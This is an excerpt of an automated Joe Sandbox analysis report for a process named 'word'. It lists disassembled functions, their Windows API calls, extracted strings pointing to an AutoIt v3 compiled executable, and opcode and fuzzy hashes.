                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                            • __fread_nolock.LIBCMT ref: 00452A39
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                            • String ID:
                                                                            • API String ID: 2054058615-0
                                                                            • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                            • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                            • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                            • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                            Function 00448759 Relevance: 33.6, APIs: 17, Strings: 2, Instructions: 311COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0044880A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window
                                                                            • String ID: 0$X+
                                                                            • API String ID: 2353593579-479754480
                                                                            • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                            • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                            • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                            • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                            Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                            • GetClientRect.USER32(?,?), ref: 004701FA
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                            • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                            • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                            • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                            • SetRect.USER32 ref: 004702F1
                                                                            • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                            • CreateWindowExW.USER32 ref: 0047033E
                                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                            • GetClientRect.USER32(?,?), ref: 00470371
                                                                            • GetStockObject.GDI32(00000011), ref: 00470391
                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                            • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 867697134-248962490
                                                                            • Opcode ID: 570e8dd5e49d98c7508f8b782fa1406b772d00bf2db2f5b8a370b42e43a4c94e
                                                                            • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                            • Opcode Fuzzy Hash: 570e8dd5e49d98c7508f8b782fa1406b772d00bf2db2f5b8a370b42e43a4c94e
                                                                            • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                            Function 0046884B Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$__wcsnicmp
                                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                            • API String ID: 790654849-1810252412
                                                                            • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                            • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                            • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                            • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                            Function 0046CAAA Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 229COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                            • API String ID: 0-1896584978
                                                                            • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                            • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                            • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                            • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                            Function 0046FB53 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 176windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                            • SendMessageW.USER32 ref: 0046FBAF
                                                                            • SendMessageW.USER32 ref: 0046FBE2
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                            • String ID: X+
                                                                            • API String ID: 2632138820-1938338529
                                                                            • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                            • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                            • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                            • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                            Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InitVariant
                                                                            • String ID:
                                                                            • API String ID: 1927566239-0
                                                                            • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                            • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                            • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                            • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                            Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • GetForegroundWindow.USER32 ref: 0046D7C1
                                                                            • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                            • IsWindow.USER32(?), ref: 0046DBDE
                                                                            • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                            • EnumChildWindows.USER32 ref: 0046DCBC
                                                                            • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                            • API String ID: 1322021666-1919597938
                                                                            • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                            • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                            • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                            • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                            Function 00469681 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 253windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$CtrlFocus
                                                                            • String ID: 0$X+
                                                                            • API String ID: 1534620443-479754480
                                                                            • Opcode ID: e2a32ae154a8fa7b81474ae7b3e79c635657a695f15150dcabcd5e036a6f6ddb
                                                                            • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                            • Opcode Fuzzy Hash: e2a32ae154a8fa7b81474ae7b3e79c635657a695f15150dcabcd5e036a6f6ddb
                                                                            • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                            Function 0045DE12 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                            • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                            • __wsplitpath.LIBCMT ref: 0045DF54
                                                                            • _wcscat.LIBCMT ref: 0045DF6C
                                                                            • _wcscat.LIBCMT ref: 0045DF7E
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                            • _wcscpy.LIBCMT ref: 0045E019
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3201719729-438819550
                                                                            • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                            • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                            • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                            • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                            Function 0046F2B0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 185windowfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                              • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                              • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                              • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                            • SendMessageW.USER32(?), ref: 0046F34C
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                            • _wcscat.LIBCMT ref: 0046F3BC
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                            • DragFinish.SHELL32(?), ref: 0046F414
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$X+
                                                                            • API String ID: 4085615965-2196474031
                                                                            • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                            • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                            • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                            • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                            Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2485277191-404129466
                                                                            • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                            • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                            • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                            • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                            Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                            • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                            • strncnt.LIBCMT ref: 00428646
                                                                            • strncnt.LIBCMT ref: 0042865A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: strncnt$CompareErrorLastString
                                                                            • String ID:
                                                                            • API String ID: 1776594460-0
                                                                            • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                            • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                            • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                            • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                            Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32 ref: 004545DA
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                            • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                            • GetWindowRect.USER32(?,?), ref: 00454688
                                                                            • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                            • GetDesktopWindow.USER32 ref: 00454708
                                                                            • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                            • GetClientRect.USER32(?,?), ref: 0045476F
                                                                            • PostMessageW.USER32 ref: 0045479E
                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                            • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                            • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                            • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                            Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
